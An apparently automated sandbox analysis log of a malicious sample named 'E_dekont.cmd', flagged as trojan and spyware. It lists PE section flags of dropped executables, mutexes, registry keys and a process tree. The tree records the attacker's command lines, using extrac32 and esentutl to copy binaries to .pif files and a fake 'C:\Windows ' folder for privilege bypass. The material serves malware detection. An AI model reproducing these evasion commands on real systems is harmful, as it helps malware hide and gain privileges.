Source: Locator.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe1.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe1.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.12.dr Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF7FD4 GetDiskFreeSpaceA, 4_2_02AF7FD4
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9, 12_1_004019F0
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02B06DC8 CoCreateInstance, 4_2_02B06DC8
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 30_2_1002CBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\AppData\Local\Temp\x.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac5-inf
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Mutant created: \Sessions\1\BaseNamedObjects\YfJ3kkV1qkbw4RSw
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Mutant created: NULL
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac59ea72c54-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac53d78ffaf-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_03
Source: C:\Windows\System32\extrac32.exe File created: C:\Users\user\AppData\Local\Temp\CAB04912.TMP
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Command line argument: 08A 12_1_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Command line argument: 08A 30_2_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Command line argument: 08A 30_1_00413780
Source: C:\Users\user\AppData\Local\Temp\x.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: E_dekont.cmd ReversingLabs: Detection: 44%
Source: E_dekont.cmd Virustotal: Detection: 46%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: unknown Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown Process created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: unknown Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown Process created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: unknown Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: url.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
